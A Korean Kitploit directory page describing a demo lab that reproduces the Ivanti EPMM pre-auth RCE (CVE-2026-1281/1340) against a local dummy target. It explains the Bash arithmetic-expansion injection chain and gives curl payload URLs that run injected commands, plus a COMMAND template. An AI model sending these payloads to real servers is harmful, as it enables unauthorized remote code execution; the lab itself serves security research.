Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Ivanti EPMM 사전 인증 RCE 취약점(CVE-2026-1281 / CVE-2026-1340)을 교육 및 보안 연구 목적으로 재현하는 방법을 보여주는 간단한 데모 애플리케이션입니다. | Kitploit
도구/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Ivanti EPMM 사전 인증 RCE 취약점(CVE-2026-1281 / CVE-2026-1340)을 교육 및 보안 연구 목적으로 재현하는 방법을 보여주는 간단한 데모 애플리케이션입니다.

저장소 보기
3127개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Ivanti EPMM 사전 인증 RCE 더미 타깃

Ivanti EPMM 사전 인증 RCE 취약점(CVE-2026-1281 / CVE-2026-1340)을 교육 및 보안 연구 목적으로 재현하는 방법을 보여주는 간단한 데모 애플리케이션입니다.

취약점 개요

이 취약점은 Bash 산술 확장(arithmetic expansion) 동작을 악용합니다. 다른 변수에 대한 참조를 포함하는 변수가 산술 컨텍스트에서 사용되고, 해당 참조 변수가 명령 치환(command substitution)이 포함된 배열 인덱스를 포함할 때 명령이 실행됩니다.

악용 체인

  1. 요청에 st=theValue (패딩이 포함된 리터럴 문자열 "theValue")가 포함됨
  2. 요청에 h=gPath[\command`]`(배열 인덱스의 명령)가 포함됨
  3. Bash 스크립트가 루프에서 key=value 쌍을 파싱하여 각 반복마다 theValue를 업데이트함
  4. gStartTime이 리터럴 문자열 "theValue"로 설정됨
  5. 루프 후 theValue에 gPath[\command`]`가 포함됨
  6. [[ ${currentTime} -gt ${gStartTime} ]]가 평가될 때:
    • ${gStartTime} → "theValue"(문자열)
    • 산술 컨텍스트가 theValue를 변수 참조로 처리함
    • theValue → gPath[\command`]`
    • 배열 인덱스가 명령 치환을 트리거함 → RCE!

빠른 시작

# 컨테이너 빌드 및 시작
docker-compose up --build -d

# 실행 확인
curl http://localhost:8180/health

취약점 테스트

1. 파일 생성 테스트

명령 실행을 증명할 파일 생성:

# URL 인코딩된 페이로드: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# 파일이 생성되었는지 확인
cat artifacts/poc

2. 시간 기반 테스트

sleep 명령으로 검증:

# 응답에 약 5초가 걸려야 함
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"

3. 사용자 정의 명령 실행

# 사용자 정의 콘텐츠 작성
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"

cat artifacts/pwned

URL 구조

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
                               │      │              │              │
                               │      │              │              └─ 페이로드: gPath[`COMMAND`]
                               │      │              └─ 종료 타임스탬프(10자리 숫자)
                               │      └─ 중요: 리터럴 "theValue" + 공백 2개(총 10자)
                               └─ 키 인덱스(임의 값)

디버깅

# 컨테이너 로그 보기
docker-compose logs -f

# 컨테이너에서 셸 실행
docker exec -it ivanti-epmm-vuln /bin/bash

# nginx 오류 로그 확인
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log

정리

docker-compose down
rm -rf artifacts/*

참고 자료

  • WatchTowr Labs 블로그 게시물

면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용해야 합니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에는 사용하지 마십시오.

도구 다운로드